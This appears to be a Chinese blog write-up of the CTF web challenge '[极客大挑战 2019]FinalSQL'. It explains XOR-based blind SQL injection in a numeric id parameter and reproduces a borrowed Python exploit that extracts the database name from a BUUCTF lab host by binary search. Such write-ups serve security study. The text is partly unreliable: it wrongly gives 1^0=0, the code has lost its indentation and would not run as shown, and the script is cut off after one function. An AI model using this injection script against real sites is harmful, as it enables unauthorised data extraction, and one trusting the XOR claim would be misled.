CTF-Web-[极客大挑战 2019]FinalSQL
本来以为是登录框注入,看别人写的writeup才发现是那几个点击按钮的数字注入。根据提示知道是盲注。
异或'^'是一种数学运算,1^1=0 0^0=0 1^0=0,可以用来进行sql注入。
当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真。
从大佬那拿的exp:(较冗余,但更易理解)
import requests
import time
host = "http://d7fe6340-f773-4d67-8be9-aefb87c7a26c.node4.buuoj.cn:81/search.php?"
def getDatabase(): #获取数据库名
global host
ans=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
url = host + "id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid)
res = requests.get(url)
if "others~~~" in res.text:
high = mid
else:
low = mid+1
mid=(low+high)//2
if mid <= 32 or mid >= 127:
break
ans += chr(mid-1)

这篇博客介绍了在CTF-Web挑战中遇到的FinalSQL问题,实际上是一个数字注入的难题,而非最初的登录框注入假设。通过分析他人的writeup,博主发现并分享了一个相对较冗余但易于理解的exploit,揭示了如何通过盲注技巧找到隐藏的flag。文章提到了利用脚本逐步揭露数据库名和表名的过程,并引用了相关资源作为参考。
最低0.47元/天 解锁文章
873

被折叠的 条评论
为什么被折叠?



